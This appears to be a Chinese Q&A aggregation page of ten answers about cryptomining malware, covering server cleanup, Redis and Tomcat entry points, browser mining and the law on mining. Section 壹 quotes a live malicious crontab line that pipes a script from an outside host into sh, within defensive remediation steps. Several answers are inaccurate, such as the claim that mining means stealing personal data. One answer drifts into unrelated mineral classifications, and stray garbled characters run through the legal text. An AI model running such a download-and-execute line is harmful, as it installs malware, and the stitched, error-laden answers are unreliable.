上網站被挖礦

『壹』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『貳』 最近聽說進入不良網站，黑客會拿我們的手機挖礦啥的，自動彈出的不良網站我點進去一秒就退了，被挖礦嗎

沒有想的那麼神奇。。現在的不良網站一般都是教人如何賭博。。如何打架什麼的。通常會有賭博網站的連接在裡面。。誘惑你去賭博的。。沒有什麼挖礦什麼的。。退出去以後。重啟下手機。。基本就正常了。。

『叄』 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

『肆』 當你瀏覽不良網站的時候，黑客們在干什麼

區塊律動 BlockBeats 做了個統計，截至7月9號，全網有超過3萬家網站內置了「挖礦」代碼，只要用戶打開網站進行瀏覽、操作，網站就會調用電腦或手機的計算資源，來進行「挖礦」。

如果你有瀏覽「黃色」網站的習慣，那你也應該注意一下，因為不少「黃色」網站未來增加收入也會加入「挖礦」代碼，除了網站所有者自行添加「挖礦」代碼之外，還有黑客黑入其他網站服務在代碼中，惡意植入「挖礦」代碼木馬的情況。是不是很可怕呢？小夥伴們有沒有遇到過手機莫名其妙發燙的現象呢？

『伍』 網上挖礦是什麼意思

一、網上的「挖礦」，指的是「礦工」根據設計者提供的開源軟體，提供一定的計算機運算力，通過復雜的數學運算，求得方程式特解的過程，求得特解的「礦工」可以得到特定數量的比特幣等虛擬貨幣獎勵。而所需的「鏟子」就是配置較高，運算速度足夠快的計算機，「礦工」也就是操縱電腦的使用者。網上「挖礦」的能源消耗和碳排放量大，對國民經濟貢獻度低，對產業發展、科技進步等帶動作用有限。
二、多部門聯合開展全面全鏈條圍剿虛擬貨幣「挖礦」行為，人民銀行會同有關部門印發了《關於進一步防範和處置虛擬貨幣交易炒作風險的通知》，明確虛擬貨幣相關業務活動屬於非法金融活動；國家發改委公開徵求《市場准入負面清單(2021年版)》意見時，將虛擬貨幣「挖礦」活動列入淘汰類，並於近期發布通報：我國將以產業式集中式「挖礦」(業界指虛擬貨幣的生產過程)、國有單位涉及「挖礦」和比特幣「挖礦」為重點，全面整治虛擬貨幣「挖礦」活動。
拓展資料：
一、礦產資源的分類，主要有：
1、根據礦產的成因和形成條件，分為內生礦產、外生礦產和變質礦產；
2、根據礦產的物質組成和結構特點，分為無機礦產和有機礦產；
3、根據礦產的產出狀態，分為固體礦產、液體礦產和氣體礦產；
4、根據礦產特性及其主要用途，分為能源礦產、金屬礦產、非金屬礦產和水氣礦產。
二、我國已探明儲量的金屬礦產有54種，即：鐵礦、錳礦、鉻礦、鈦礦、釩礦、銅礦、鉛礦、鋅礦、鋁土礦、鎂礦、鎳礦、鈷礦、鎢礦、錫礦、鉍礦、鉬礦、汞礦、銻礦、鉑族金屬(鉑礦、鈀礦、銥礦、銠礦、鋨礦、釕礦)、金礦、銀礦、鈮礦、鉭礦、鈹礦、鋰礦、鋯礦、鍶礦、銣礦、銫礦、稀土元素(釔礦、釓礦、鋱礦、鏑礦、鈰礦、鑭礦、鐠礦、釹礦、釤礦、銪礦)、鍺礦、鎵礦、銦礦、鉈礦、鉿礦、錸礦、鎘礦、鈧礦、硒礦、蹄礦。

『陸』 手機被別人挖礦是什麼意思

被挖礦是指瀏覽不良網站背後的黑客會通過程序竊取你的個人信息。
一旦出現這種情況，那麼就說明你的個人信息肯定是已經泄露了，而一般的正規網站是不會泄露用戶的個人信息，只有經常瀏覽一些釣魚網站、盜版資源網站和不良網站，才會導致個人信息泄露。另外，申請好友的陌生人，基本都是一些帶著「美女頭像」，且備注的信息都充滿誘導性，而目的就是為了讓我們同意。

『柒』 網路挖礦違法嗎有多嚴重

網路挖礦是犯法的。網路「挖礦」，是指計算機被植入的軟體程序，會通過特定演算法，在計算機上進行運算。運算完成後，自動得到特定結果，從而產生虛擬幣，這些虛擬幣可在第三方平台換算，從而信並高獲得真實貨幣的行為，我國法律明確禁止公民有加密貨幣挖礦交易的行為。網路挖礦犯法嗎網路挖礦是犯法的。網路「挖礦」，是指計算機被植入的軟體程序，會通過特定演算法，在計算機上進行運算。運算完成後，自動得到特定結果，從而產生虛擬幣，這些虛擬幣可在第三方平台換算，從而獲得真實貨幣的行為，我國法律明確禁止公民有加密貨幣挖礦交易的行為。網路挖礦犯法嗎的法律依據《刑法》第二百八十五條
違反國家規定，侵入國家事務、國防建設、蔽州尖端科學技術領域的計算機信息系統的，處三年以下有期徒刑或者拘役。
違反國家規定，侵入前款規定以外的計算機信息系統或者採用其他技術手段，獲取該計算機信息系統中存儲、處理或者傳輸的數據，或者對該計算機信息系統實施非法控制，情節嚴重的，處三年以下有期徒刑或者拘役，並處滑尺或者單處罰金;情節特別嚴重的，處三年以上七年以下有期徒刑，並處罰金。
提供專門用於侵入、非法控制計算機信息系統的程序、工具，或者明知他人實施侵入、非法控制計算機信息系統的違法犯罪行為而為其提供程序、工具，情節嚴重的，依照前款的規定處罰。

『捌』 無線網被破解拿去挖礦什麼意思

其實是集成一些程序在路由器里，然後可以收集你的空閑上傳帶寬（一般人的上傳帶寬都用不著，會浪費掉），然後給你回報，這個過程就是挖礦。
虛擬貨幣的生產過程被稱為「挖礦」，屬於違法行為。
需要用電腦搜尋64位的數字就行，然後通過反復解謎密與其他淘金者相互競爭，為比特幣網路提供所需的數字，如果用戶的電腦成功地創造出一組數字，那麼就將會獲得25個比特幣。簡單來說就是來尋找比特幣。
由於比特幣系統採用了分散化編程，所以在每10分鍾內只能獲得25個比特幣，而到2140年，流通的比特幣上限將會達到2100萬。換句話說，比特幣系統是能夠實現自給自足的，通過編碼來抵禦通脹，並防止他人對這些代碼進行破壞。

『玖』 玩網路游戲也能被網通公司涉嫌挖礦嗎

所謂網路「挖礦」，是指計算機被植入的軟體程序，會通過特定演算法，在計算機上進行運算。運算完成後，自動得到特定結果，從而產生虛擬幣，這些虛擬幣可在第三方平台換算，獲得真實貨幣。由於這種程序的非破壞性和隱蔽性，即使用戶電腦中毒也不會像勒索病毒一樣即時感知到。挖礦木馬只會潛伏在用戶的電腦中，定時啟動挖礦程序進行計算，大量消耗用戶電腦資源，導致用戶電腦性能變低，運行速度變慢，使用壽命變短，甚至燒壞電腦硬體。所以玩網路游戲不會被網通公司涉嫌挖礦的。

『拾』 手機被植入挖礦代碼怎麼辦，訪問不良網站後手機變卡

清除手機數據，如果有重要的東西先保存在網盤上，然後再恢復出廠設置三次，這樣比較安全，